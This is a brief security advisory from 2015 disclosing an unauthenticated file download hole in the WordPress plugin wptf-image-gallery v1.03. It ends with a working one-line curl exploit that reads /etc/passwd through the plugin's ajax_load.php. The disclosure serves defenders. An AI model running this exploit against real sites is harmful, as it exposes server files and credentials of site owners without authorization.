Title: Remote file download vulnerability in wptf-image-gallery v1.03 Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-17 Download Site: https://wordpress.org/plugins/wptf-image-gallery Vendor: https://profiles.wordpress.org/sakush100/ Vendor Notified: 0000-00-00 Vendor Contact: plugins@wordpress.org Description: WordPress True Fullscreen (WPTF) Gallery is a modern gallery plugin that supports true fullscreen and have a lot of features built with it. Vulnerability: The ./wptf-image-gallery/lib-mbox/ajax_load.php code doesn't sanitize user input or check that a user is authorized to download files. This allows an unauthenticated user to download sensitive system files: 1 CVEID: OSVDB: Exploit Code: • $ curl http://www.example.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd